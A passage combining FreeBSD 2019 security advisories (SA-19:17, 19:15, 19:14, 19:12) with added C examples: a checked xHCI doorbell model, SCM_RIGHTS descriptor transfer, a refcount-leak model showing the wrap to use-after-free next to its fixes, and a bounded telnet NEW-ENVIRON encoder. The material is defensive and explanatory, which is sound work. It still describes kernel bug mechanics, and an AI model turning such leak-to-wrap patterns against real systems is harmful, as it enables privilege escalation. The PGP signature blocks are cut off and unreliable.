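 * the endpoint's state decides whether a stream id is meaningful at all.
 * NULL means "ignore this doorbell". */
static struct stream_ctx *
lookup_checked(struct xhci_model *dev, uint32_t epid, uint32_t streamid)
{
    if (epid >= MODEL_MAX_ENDPOINTS)
        return NULL;
    struct endpoint *ep = &dev->eps[epid];
    if (!ep->configured)
        return NULL;
    if (!ep->streams_enabled)
        return streamid == 0 ? &ep->streams[0] : NULL;
    if (streamid >= MODEL_MAX_STREAMS)
        return NULL;
    return &ep->streams[streamid];
}

/* Doorbell register write as performed by the guest. Returns 0 when the
 * doorbell is processed, -1 when it is dropped. */
int
xhci_model_doorbell(struct xhci_model *dev, uint32_t epid, uint32_t streamid)
{
    struct stream_ctx *sc = lookup_checked(dev, epid, streamid);
    if (sc == NULL) {
        dev->doorbells_rejected++;
        return -1;
    }
    sc->ring_idx++;               /* stand-in for kicking the transfer ring */
    dev->doorbells_rung++;
    return 0;
}

/* Constructed device state: endpoint 1 without streams, endpoint 2 with
 * streams, everything else unconfigured. Returns dev for convenience. */
struct xhci_model *
xhci_model_init(struct xhci_model *dev)
{
    memset(dev, 0, sizeof *dev);
    dev->eps[1].configured = true;
    dev->eps[2].configured = true;
    dev->eps[2].streams_enabled = true;
    return dev;
}

struct xhci_model demo_dev;       /* instance used by the usage below and the tests */

int
main(void)
{
    xhci_model_init(&demo_dev);
    /* A well-behaved guest and a misbehaving one, side by side. */
    printf("ep1/stream0      -> %d\n", xhci_model_doorbell(&demo_dev, 1, 0));
    printf("ep2/stream5      -> %d\n", xhci_model_doorbell(&demo_dev, 2, 5));
    printf("ep2/stream16     -> %d\n", xhci_model_doorbell(&demo_dev, 2, 16));
    printf("ep32/stream0     -> %d\n", xhci_model_doorbell(&demo_dev, 32, 0));
    printf("ep0xffffffff     -> %d\n", xhci_model_doorbell(&demo_dev, 0xffffffffu, 0));
    /* The unchecked lookup is only safe for indices validated elsewhere. */
    printf("ep2/stream5 ring_idx = %u\n", lookup_unchecked(&demo_dev, 2, 5)->ring_idx);
    return 0;
}
```

The checked handler also counts rejections, which is the signal a hypervisor operator would want logged: a guest that repeatedly rings doorbells for endpoints it never configured is probing, not misbehaving by accident.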
FreeBSD Security Advisory FreeBSD-SA-19:17.fd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:17.fd                                         Security Advisory
                                                          The FreeBSD Project

Topic:          File description reference count leak

Category:       core
Module:         unix
Announced:      2019-07-24
Credits:        Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-22 19:25:05 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:57:49 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-22 19:27:23 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:57:49 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:57:49 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5607

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

UNIX-domain sockets are used for inter-process communication. It is possible
to use UNIX-domain sockets to transfer rights, encoded as file descriptors,
to another process. Rights are encapsulated in control messages, and
multiple such messages may be transmitted with a single system call.

II.  Problem Description

If a process attempts to transmit rights over a UNIX-domain socket and an
error causes the attempt to fail, references acquired on the rights are not
released and are leaked. This bug can be used to cause the reference counter
to wrap around and free the corresponding file structure.

III. Impact

A local user can exploit the bug to gain root privileges or escape from a
jail.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch.asc
# gpg --verify fd.11.2.patch.asc

[FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch.asc
# gpg --verify fd.11.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch.asc
# gpg --verify fd.12.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r350222
releng/12.0/                                                      r350286
stable/11/                                                        r350223
releng/11.2/                                                      r350286
releng/11.3/                                                      r350286
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5607>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:17.fd.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WnBfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIOTQ/+KQMGXwNiuMVNib5ErewD9QdT48NYaU/hYUub3VMAfQltvWmbiPw7zXj7
yJGm9FxWrMvZ6hFnKskV60u9d7PMYkOv4nzcaFgPoadByXXlALQGd/ansrZFyTJr
b
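The SA-19:17 background describes the mechanism without showing it: rights travel as SCM_RIGHTS control messages, and one sendmsg(2) may carry several. The C program below is an added example, not FreeBSD kernel or test code. It performs such a transfer over a socketpair with one control message per descriptor, receives the rights on the other end and proves they refer to the same pipe, then exercises the failure case the advisory refers to, a transfer that fails with EBADF because a descriptor in the message is not open. Userland cannot observe the kernel's reference counts, so the example only drives the path; MAX_RIGHTS and the one-byte payload are choices made for this example.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

#define MAX_RIGHTS 8              /* per message; a limit chosen for this example */

/* Send nfds descriptors in ONE sendmsg(2), each as its own SCM_RIGHTS control
 * message. The one-byte payload exists because rights must ride on data.
 * Returns 0, or -1 with errno set (EBADF when a descriptor is not open). */
int
send_rights(int sock, const int *fds, int nfds)
{
    char payload = 'R';
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    char cbuf[CMSG_SPACE(sizeof(int)) * MAX_RIGHTS];
    struct msghdr msg;
    struct cmsghdr *cm;
    int i;

    if (nfds < 1 || nfds > MAX_RIGHTS) {
        errno = EINVAL;
        return -1;
    }
    memset(cbuf, 0, sizeof cbuf);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = CMSG_SPACE(sizeof(int)) * (size_t)nfds;
    for (i = 0, cm = CMSG_FIRSTHDR(&msg); i < nfds && cm != NULL;
         i++, cm = CMSG_NXTHDR(&msg, cm)) {
        cm->cmsg_level = SOL_SOCKET;
        cm->cmsg_type = SCM_RIGHTS;
        cm->cmsg_len = CMSG_LEN(sizeof(int));
        memcpy(CMSG_DATA(cm), &fds[i], sizeof(int));
    }
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive the rights carried by one message. Works whether the kernel delivers
 * one control message per descriptor (as sent) or merges them into a single
 * SCM_RIGHTS message. Descriptors that do not fit in fds[], or that arrive in
 * a truncated control buffer, are closed rather than leaked. Returns the number
 * stored, or -1 on error. */
int
recv_rights(int sock, int *fds, int max)
{
    char payload;
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    char cbuf[CMSG_SPACE(sizeof(int)) * MAX_RIGHTS];
    struct msghdr msg;
    struct cmsghdr *cm;
    int n = 0, truncated;

    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof cbuf;
    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    truncated = (msg.msg_flags & MSG_CTRUNC) != 0;
    for (cm = CMSG_FIRSTHDR(&msg); cm != NULL; cm = CMSG_NXTHDR(&msg, cm)) {
        if (cm->cmsg_level != SOL_SOCKET || cm->cmsg_type != SCM_RIGHTS)
            continue;
        size_t count = (cm->cmsg_len - CMSG_LEN(0)) / sizeof(int);
        for (size_t i = 0; i < count; i++) {
            int fd;
            memcpy(&fd, CMSG_DATA(cm) + i * sizeof(int), sizeof fd);
            if (!truncated && n < max)
                fds[n++] = fd;
            else
                close(fd);
        }
    }
    if (truncated) {
        errno = EMSGSIZE;
        return -1;
    }
    return n;
}

/* Successful transfer: both ends of a constructed pipe cross the socket; a byte
 * written through the received write end must come back through the received
 * read end. Returns the number of rights received (2), or -1. */
int
demo_transfer(void)
{
    int sv[2], p[2], got[MAX_RIGHTS], rights[2], n;
    char c = 'x', r = 0;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0 || pipe(p) < 0)
        return -1;
    rights[0] = p[0];
    rights[1] = p[1];
    if (send_rights(sv[0], rights, 2) < 0)
        return -1;
    n = recv_rights(sv[1], got, MAX_RIGHTS);
    if (n != 2 || write(got[1], &c, 1) != 1 || read(got[0], &r, 1) != 1 || r != 'x')
        return -1;
    for (int i = 0; i < 2; i++) { close(got[i]); close(p[i]); close(sv[i]); }
    return n;
}

/* Failed transfer: the rights name descriptors that were closed just before the
 * call, so the kernel rejects the message. Returns the errno from sendmsg. */
int
demo_failed_transfer(void)
{
    int sv[2], p[2], rights[2], err = 0;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0 || pipe(p) < 0)
        return -1;
    close(p[0]);
    close(p[1]);
    rights[0] = p[0];                 /* stale numbers: no open file behind them */
    rights[1] = p[1];
    if (send_rights(sv[0], rights, 2) < 0)
        err = errno;
    close(sv[0]);
    close(sv[1]);
    return err;
}

int
main(void)
{
    printf("transfer: %d rights received\n", demo_transfer());
    printf("failed transfer: errno %d (EBADF = %d)\n", demo_failed_transfer(), EBADF);
    return 0;
}
```

A receiver that stops iterating control messages after the first SCM_RIGHTS, or that ignores MSG_CTRUNC, leaks descriptors in its own process on exactly the kinds of messages the advisory is about; recv_rights closes anything it cannot hand back for that reason.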
FreeBSD Security Advisory FreeBSD-SA-19:15.mqueuefs
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:15.mqueuefs                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Reference count overflow in mqueue filesystem

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        Mateusz Guzik
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-23 21:12:32 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:55:16 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-23 21:15:28 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:55:16 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:55:16 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5603

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

mqueuefs(5) implements the POSIX message queue file system, which can be
used by processes as a communication mechanism.

'struct file' represents open files, directories, sockets and other
entities.

II.  Problem Description

System calls operating on file descriptors obtain a reference to the
relevant struct file which, due to a programming error, was not always put
back. This could be used to overflow the reference counter of the affected
struct file.

III. Impact

A local user can use this flaw to obtain access to files, directories,
sockets etc. opened by processes owned by other users. If the obtained
struct file represents a directory from outside of the user's jail, it can
be used to access files outside of the jail. If the user in question is a
jailed root they can obtain root privileges on the host system.

IV.  Workaround

No workaround is available. Note that the mqueuefs file system is not
enabled by default.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch
# fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch.asc
# gpg --verify mqueuefs.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r350261
releng/12.0/                                                      r350284
stable/11/                                                        r350263
releng/11.2/                                                      r350284
releng/11.3/                                                      r350284
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:15.mqueuefs.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIWpBAAg9BmPamkj7wLJODR8SvNk+qYqEbYeakiSGnvXllz2l+qI2dhMVsuQRGQ
ko7VY0P2Wuh68UiiDG63Oq3hbOWPPkL1axk6n275rZSdoVj856tjrHjnUtP3UX5S
WQUKRAREjhVjM9dAOwCYrmAmcpX4SkslklhfiR6AR62t4eptMlfJ6ACQATs6FPnX
WRdyDe7yq0mL4UHWg+PvotQ+rxGiynwgVRMXwaglKOldGOuPOeuj7azM4nb6/qkN
GjJlJOIRwfU1/sXVII3cCzndnCrz5A0sSttg
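SA-19:17 and SA-19:15 are one bug class seen twice: a reference taken on a struct file is not put back on some path, and enough repetitions wrap the counter so the object is freed while still in use. The C model below is an added example, not FreeBSD's struct file or reference-counting code. Its counter is deliberately 16 bits wide so a test can reach the wrap (the kernel's counter is wider, which changes only the number of leaks required). It puts the early-return leak next to the single-exit fix, and beside both a saturating hold/drop pair in the spirit of Linux's refcount_t, which turns a residual leak into a memory leak instead of a use-after-free.

```c
#include <stdint.h>
#include <stdio.h>

/* Narrow on purpose so the wrap is reachable in a test. */
typedef uint16_t refcnt_t;
#define REFCNT_SATURATED ((refcnt_t)0xFFFF)

struct file_model {
    refcnt_t count;   /* outstanding references; object freed when it reaches 0 */
    int freed;        /* set by the final drop: models the memory going back to the allocator */
};

/* Unprotected hold/drop: the shape of a plain counter. */
static void fhold_plain(struct file_model *fp) { fp->count++; }
static void fdrop_plain(struct file_model *fp) { if (--fp->count == 0) fp->freed = 1; }

/* Saturating hold/drop: once the counter hits its ceiling it is pinned there
 * and the object can never be freed. A leak then costs memory rather than
 * producing a use-after-free. Modelled on the idea behind Linux's refcount_t;
 * not FreeBSD's implementation. */
static void fhold_sat(struct file_model *fp) { if (fp->count != REFCNT_SATURATED) fp->count++; }
static void fdrop_sat(struct file_model *fp)
{
    if (fp->count == REFCNT_SATURATED)
        return;                                /* pinned: never free */
    if (--fp->count == 0)
        fp->freed = 1;
}

/* Model of a system call on a descriptor: hold the file for the duration,
 * validate, work, drop. Buggy: the validation failure returns early and the
 * reference is never put back. */
int
op_buggy(struct file_model *fp, int request)
{
    fhold_plain(fp);
    if (request < 0)
        return -1;                             /* leaked reference on every failure */
    /* ... work ... */
    fdrop_plain(fp);
    return 0;
}

/* Fixed: one exit path, so the reference is released however the call ends. */
int
op_fixed(struct file_model *fp, int request)
{
    int error = 0;

    fhold_plain(fp);
    if (request < 0)
        error = -1;
    /* else ... work ... */
    fdrop_plain(fp);
    return error;
}

/* The same early-return bug on a saturating counter (defence in depth). */
int
op_buggy_sat(struct file_model *fp, int request)
{
    fhold_sat(fp);
    if (request < 0)
        return -1;
    fdrop_sat(fp);
    return 0;
}

/* Drive `failures` failing calls against an object whose owner holds one
 * reference, then perform one balanced hold/drop as an unrelated user would.
 * Returns 1 if that balanced use freed the object out from under its owner. */
int
uaf_after_leaks(unsigned long failures, int (*op)(struct file_model *, int))
{
    struct file_model f = { .count = 1, .freed = 0 };   /* the descriptor table's reference */

    for (unsigned long i = 0; i < failures; i++)
        op(&f, -1);                            /* every call fails */
    fhold_sat(&f);
    fdrop_sat(&f);
    return f.freed;
}

int
main(void)
{
    printf("buggy,  65535 failures: freed under owner = %d\n", uaf_after_leaks(65535, op_buggy));
    printf("fixed,  65535 failures: freed under owner = %d\n", uaf_after_leaks(65535, op_fixed));
    printf("buggy on saturating counter, 70000 failures: %d\n", uaf_after_leaks(70000, op_buggy_sat));
    return 0;
}
```

The second defence matters because the first is a discipline, not a guarantee: every future error path in every operation on the object must honour it, whereas saturation is enforced once, in the counter.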
FreeBSD Security Advisory FreeBSD-SA-19:14.freebsd32
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:14.freebsd32                                  Security Advisory
                                                          The FreeBSD Project

Topic:          Kernel memory disclosure in freebsd32_ioctl

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        Ilja van Sprundel, IOActive
Affects:        FreeBSD 11.2 and FreeBSD 11.3
Corrected:      2019-07-22 18:14:34 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:54:10 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:54:10 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5605

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The FreeBSD kernel supports executing 32-bit applications on a 64-bit
kernel, including the ioctl(2) interface.

II.  Problem Description

Due to insufficient initialization of memory copied to userland in the
components listed above, small amounts of kernel memory may be disclosed to
userland processes.

III. Impact

A user who can invoke 32-bit FreeBSD ioctls may be able to read the contents
of small portions of kernel memory. Such memory might contain sensitive
information, such as portions of the file cache or terminal buffers. This
information might be directly useful, or it might be leveraged to obtain
elevated privileges in some way; for example, a terminal buffer might
include a user-entered password.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch
# fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch.asc
# gpg --verify freebsd32.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/11/                                                        r350217
releng/11.2/                                                      r350283
releng/11.3/                                                      r350283
- -------------------------------------------------------------------------

Note: This issue was addressed in a different way prior to the branch point
for stable/12. As such, no patch is needed for FreeBSD 12.x.

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5605>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:14.freebsd32.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmNfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIavw//emdRXVNpGREW1FfUvWmUPpdgk6rFck9nEG0KUKYCcfhqN83BN9XtqaWu
lBQ1jbB/CsalwL6Gpn2yuMvgS8W4yUidyPHLpzuoAThlsy5bHID1/oRftJt0T0BS
kHbTD0tTUt3QDV51FoLBjvXfjRRb8xJ+wIGJ0NzOscWgjgu6JPUysHEJD3+vSOKN
X3qJd3zcoYqswcvuhoVE2cFrSaZKEyIi1pJVr9CGItQTWXIisgdXdGYTnBdZU8jq
iJGaI1BXiNUl/p/21JA32T+ZD7cdMtx6KiuoKlY7Bzgj7Qk3XW7xsQsYu724LIJT
pVhIxntMrQSak7wIaqNPGR/FgkkKDsoo6iCHXlGxXv6tLg7pnioZIaHhc5+UZqmT
8I0UogWhQZS03/nwFRVDLPp+ka2P0g2gsm/dX1UVuucMT+hGeqn2c/iaSU76duoR
qavRPjLPJDnfVrpXhpqco9rq1+UwA/1uSNe0cFX0ArX040hCReDsMphcxgrkZ0sD
u71Px2ZLE5rpWmFd8LD0X2y1l4OEcTmoTPUtJxHlVrMFztuNbAlRnyCxTV8c2uId
zN44wRj6c2ZEV/w+kBVTV+L7NSt1eHDZ5tgUL7b
FreeBSD Security Advisory FreeBSD-SA-19:12.telnet
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:12.telnet                                     Security Advisory
                                                          The FreeBSD Project

Topic:          telnet(1) client multiple vulnerabilities

Category:       contrib
Module:         contrib/telnet
Announced:      2019-07-24
Credits:        Juniper Networks
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-19 15:37:29 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:51:52 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-19 15:27:53 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:51:52 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:51:52 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-0053

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The telnet(1) command is a TELNET protocol client, used primarily to
establish terminal sessions across a network.

II.  Problem Description

Insufficient validation of environment variables in the telnet client
supplied in FreeBSD can lead to stack-based buffer overflows. A stack-based
overflow is present in the handling of environment variables when
connecting via the telnet client to remote telnet servers.

This issue only affects the telnet client. Inbound telnet sessions to
telnetd(8) are not affected by this issue.

III. Impact

These buffer overflows may be triggered when connecting to a malicious
server, or by an active attacker in the network path between the client and
server. Specially crafted TELNET command sequences may cause the execution
of arbitrary code with the privileges of the user invoking telnet(1).

IV.  Workaround

Do not use telnet(1) to connect to untrusted machines or over an untrusted
network.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch
# fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch.asc
# gpg --verify telnet.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r350139
releng/12.0/                                                      r350281
stable/11/                                                        r350140
releng/11.2/                                                      r350281
releng/11.3/                                                      r350281
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0053>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:12.telnet.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WltfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLOzA//YxRZNUr+d8B+t6DnBUbVvthJiY9sQ1YPXUIJmp4QA7wvXr5UjURw+6qv
raxEp6JmF06wZK4RjeIFckQD6s2wnjO5VHO80Zbs0nD4NejQGeDAIlVdKqofOtJv
bBQNSY3vPAtumyfElc+N19rKetAjGbsUjOMbn87GlWrit4lqcavBQsdmSlQB5gVA
dFAFsVxr+ujjATnrCmIpFiaDk0unyJ7Gtz7jiM9I8xZueJtM49/9kNCFFLKCMUl8
HpB2k0cb18GVNJoKtzo1nELOM/oIJVO5HZt1fmYG/RgeL1BSyzg4q/5
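SA-19:12 concerns the telnet client's handling of environment variables, which travel in NEW-ENVIRON (RFC 1572) subnegotiations. The C code below is an added example, not contrib/telnet code and not a reconstruction of the patched function: a bounded encoder for the IAC SB NEW-ENVIRON IS ... IAC SE reply that applies the RFC's ESC and IAC escaping and refuses, rather than overruns, when the result does not fit the buffer it was given. The constructed USER/alice and escaping inputs and the 64-byte window in demo_overflow_refused() are fixtures for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* TELNET and NEW-ENVIRON (RFC 1572) constants. */
enum { IAC = 255, SB = 250, SE = 240, TELOPT_NEW_ENVIRON = 39 };
enum { ENV_IS = 0, ENV_SEND = 1, ENV_INFO = 2 };
enum { ENV_VAR = 0, ENV_VALUE = 1, ENV_ESC = 2, ENV_USERVAR = 3 };

/* Output cursor that never writes past `cap`; an attempt to do so only sets
 * `overflow`, which the encoder turns into an error return. */
struct obuf {
    unsigned char *p;
    size_t len, cap;
    int overflow;
};

static void
put(struct obuf *b, unsigned char c)
{
    if (b->len >= b->cap) {
        b->overflow = 1;
        return;
    }
    b->p[b->len++] = c;
}

/* Emit a name or value with RFC 1572 escaping: the bytes VAR, VALUE, ESC and
 * USERVAR are preceded by ESC; IAC is doubled as in any subnegotiation. */
static void
put_escaped(struct obuf *b, const char *s)
{
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;
        if (c == IAC)
            put(b, IAC);
        else if (c <= ENV_USERVAR)
            put(b, ENV_ESC);
        put(b, c);
    }
}

/* Encode IAC SB NEW-ENVIRON IS { VAR|USERVAR name [VALUE value] }... IAC SE
 * into out[0..cap). names/values/uservar are parallel arrays of n entries; a
 * NULL value means "variable is undefined". Returns the encoded length, or -1
 * if it would not fit. Nothing is ever written at or beyond out + cap. */
long
env_encode_is(unsigned char *out, size_t cap, const char *const names[],
    const char *const values[], const int uservar[], size_t n)
{
    struct obuf b = { out, 0, cap, 0 };

    put(&b, IAC); put(&b, SB); put(&b, TELOPT_NEW_ENVIRON); put(&b, ENV_IS);
    for (size_t i = 0; i < n; i++) {
        put(&b, uservar[i] ? ENV_USERVAR : ENV_VAR);
        put_escaped(&b, names[i]);
        if (values[i] != NULL) {
            put(&b, ENV_VALUE);
            put_escaped(&b, values[i]);
        }
    }
    put(&b, IAC); put(&b, SE);
    return b.overflow ? -1 : (long)b.len;
}

/* Constructed inputs for the usage below and the tests. */
const char *const demo_names[]   = { "USER" };
const char *const demo_values[]  = { "alice" };
const int         demo_uservar[] = { 0 };
const char *const esc_names[]    = { "A" };
const char *const esc_values[]   = { "\x01" "x" "\xff" };  /* VALUE byte and IAC inside a value */
const int         esc_uservar[]  = { 1 };
unsigned char demo_out[64];

/* An oversized value must be refused, not written past the buffer: the guard
 * byte after the 64-byte window has to survive. Returns 1 when it does. */
int
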